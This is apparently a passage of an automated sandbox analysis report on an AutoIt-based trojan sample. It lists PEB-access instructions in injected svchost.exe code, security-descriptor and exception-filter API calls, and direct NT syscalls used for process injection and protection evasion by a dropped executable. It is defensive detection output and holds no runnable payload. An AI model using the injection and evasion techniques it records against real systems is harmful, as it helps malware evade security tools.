Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] | 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] | 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] | 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] | 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6E443 mov eax, dword ptr fs:[00000030h] | 2_2_03C6E443
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEA456 mov eax, dword ptr fs:[00000030h] | 2_2_03CEA456
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2645D mov eax, dword ptr fs:[00000030h] | 2_2_03C2645D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5245A mov eax, dword ptr fs:[00000030h] | 2_2_03C5245A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC460 mov ecx, dword ptr fs:[00000030h] | 2_2_03CBC460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h] | 2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h] | 2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5A470 mov eax, dword ptr fs:[00000030h] | 2_2_03C5A470
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h] | 2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h] | 2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C68402 mov eax, dword ptr fs:[00000030h] | 2_2_03C68402
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h] | 2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h] | 2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2E420 mov eax, dword ptr fs:[00000030h] | 2_2_03C2E420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2C427 mov eax, dword ptr fs:[00000030h] | 2_2_03C2C427
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] | 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] | 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] | 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] | 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] | 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] | 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB6420 mov eax, dword ptr fs:[00000030h] | 2_2_03CB6420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6A430 mov eax, dword ptr fs:[00000030h] | 2_2_03C6A430
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h] | 2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h] | 2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C50BCB mov eax, dword ptr fs:[00000030h] | 2_2_03C50BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h] | 2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h] | 2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30BCD mov eax, dword ptr fs:[00000030h] | 2_2_03C30BCD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDEBD0 mov eax, dword ptr fs:[00000030h] | 2_2_03CDEBD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38BF0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EBFC mov eax, dword ptr fs:[00000030h] | 2_2_03C5EBFC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBCBF0 mov eax, dword ptr fs:[00000030h] | 2_2_03CBCBF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h] | 2_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40BBE mov eax, dword ptr fs:[00000030h] | 2_2_03C40BBE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_03CE4BB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h] | 2_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CE4B4B mov eax, dword ptr fs:[00000030h] | 2_2_03CE4B4B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] | 2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] | 2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] | 2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D02B57 mov eax, dword ptr fs:[00000030h] | 2_2_03D02B57
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h] | 2_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC6B40 mov eax, dword ptr fs:[00000030h] | 2_2_03CC6B40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFAB40 mov eax, dword ptr fs:[00000030h] | 2_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD8B42 mov eax, dword ptr fs:[00000030h] | 2_2_03CD8B42
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28B50 mov eax, dword ptr fs:[00000030h] | 2_2_03C28B50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDEB50 mov eax, dword ptr fs:[00000030h] | 2_2_03CDEB50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2CB7E mov eax, dword ptr fs:[00000030h] | 2_2_03C2CB7E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04B00 mov eax, dword ptr fs:[00000030h] | 2_2_03D04B00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 2_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h] | 2_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EB20 mov eax, dword ptr fs:[00000030h] | 2_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h] | 2_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CF8B28 mov eax, dword ptr fs:[00000030h] | 2_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h] | 2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h] | 2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86ACC mov eax, dword ptr fs:[00000030h] | 2_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03C30AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C64AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h] | 2_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6AAEE mov eax, dword ptr fs:[00000030h] | 2_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04A80 mov eax, dword ptr fs:[00000030h] | 2_2_03D04A80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C68A90 mov edx, dword ptr fs:[00000030h] | 2_2_03C68A90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C38AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C86AA4 mov eax, dword ptr fs:[00000030h] | 2_2_03C86AA4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 2_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h] | 2_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C40A5B mov eax, dword ptr fs:[00000030h] | 2_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA6F mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDEA60 mov eax, dword ptr fs:[00000030h] | 2_2_03CDEA60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h] | 2_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CACA72 mov eax, dword ptr fs:[00000030h] | 2_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBCA11 mov eax, dword ptr fs:[00000030h] | 2_2_03CBCA11
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA24 mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA24
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5EA2E mov eax, dword ptr fs:[00000030h] | 2_2_03C5EA2E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h] | 2_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C54A35 mov eax, dword ptr fs:[00000030h] | 2_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6CA38 mov eax, dword ptr fs:[00000030h] | 2_2_03C6CA38
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC69C0 mov eax, dword ptr fs:[00000030h] | 2_2_03CC69C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C649D0 mov eax, dword ptr fs:[00000030h] | 2_2_03C649D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFA9D3 mov eax, dword ptr fs:[00000030h] | 2_2_03CFA9D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBE9E0 mov eax, dword ptr fs:[00000030h] | 2_2_03CBE9E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h] | 2_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C629F9 mov eax, dword ptr fs:[00000030h] | 2_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h] | 2_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C309AD mov eax, dword ptr fs:[00000030h] | 2_2_03C309AD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB89B3 mov esi, dword ptr fs:[00000030h] | 2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h] | 2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB89B3 mov eax, dword ptr fs:[00000030h] | 2_2_03CB89B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB0946 mov eax, dword ptr fs:[00000030h] | 2_2_03CB0946
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D04940 mov eax, dword ptr fs:[00000030h] | 2_2_03D04940
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h] | 2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h] | 2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C56962 mov eax, dword ptr fs:[00000030h] | 2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h] | 2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E mov edx, dword ptr fs:[00000030h] | 2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E mov eax, dword ptr fs:[00000030h] | 2_2_03C7096E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h] | 2_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD4978 mov eax, dword ptr fs:[00000030h] | 2_2_03CD4978
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC97C mov eax, dword ptr fs:[00000030h] | 2_2_03CBC97C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h] | 2_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CAE908 mov eax, dword ptr fs:[00000030h] | 2_2_03CAE908
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC912 mov eax, dword ptr fs:[00000030h] | 2_2_03CBC912
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h] | 2_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28918 mov eax, dword ptr fs:[00000030h] | 2_2_03C28918
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB892A mov eax, dword ptr fs:[00000030h] | 2_2_03CB892A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CC892B mov eax, dword ptr fs:[00000030h] | 2_2_03CC892B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5E8C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C5E8C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03D008C0 mov eax, dword ptr fs:[00000030h] | 2_2_03D008C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CFA8E4 mov eax, dword ptr fs:[00000030h] | 2_2_03CFA8E4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h] | 2_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C6C8F9 mov eax, dword ptr fs:[00000030h] | 2_2_03C6C8F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C30887 mov eax, dword ptr fs:[00000030h] | 2_2_03C30887
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBC89D mov eax, dword ptr fs:[00000030h] | 2_2_03CBC89D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C42840 mov ecx, dword ptr fs:[00000030h] | 2_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C60854 mov eax, dword ptr fs:[00000030h] | 2_2_03C60854
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h] | 2_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C34859 mov eax, dword ptr fs:[00000030h] | 2_2_03C34859
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h] | 2_2_03CBE872
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CBE872 mov eax, dword ptr fs:[00000030h] | 2_2_03CBE872
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007A81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_007A81F7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0077A364 SetUnhandledExceptionFilter, | 0_2_0077A364
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_0077A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 0_2_0077A395

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtResumeThread: Direct from: 0x773836AC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtMapViewOfSection: Direct from: 0x77382D1C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtWriteVirtualMemory: Direct from: 0x77382E3C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtProtectVirtualMemory: Direct from: 0x77382F9C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtSetInformationThread: Direct from: 0x773763F9
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtCreateMutant: Direct from: 0x773835CC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtNotifyChangeKey: Direct from: 0x77383C2C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtSetInformationProcess: Direct from: 0x77382C5C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtCreateUserProcess: Direct from: 0x7738371C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtQueryInformationProcess: Direct from: 0x77382C26
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtResumeThread: Direct from: 0x77382FBC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtWriteVirtualMemory: Direct from: 0x7738490C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtAllocateVirtualMemory: Direct from: 0x77383C9C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtReadFile: Direct from: 0x77382ADC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtAllocateVirtualMemory: Direct from: 0x77382BFC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtDelayExecution: Direct from: 0x77382DDC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtQuerySystemInformation: Direct from: 0x77382DFC
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtOpenSection: Direct from: 0x77382E0C
Source: C:\Program Files (x86)\FqOVJbkjNlBMPAtWdOZPJkHuEnncFfBKkScFEQqmaoPsdrnmayStjASVsgenZeEJISOqsh\DUipWAeQLm.exe | NtQueryVolumeInformationFile: Direct from: 0x77382F2C
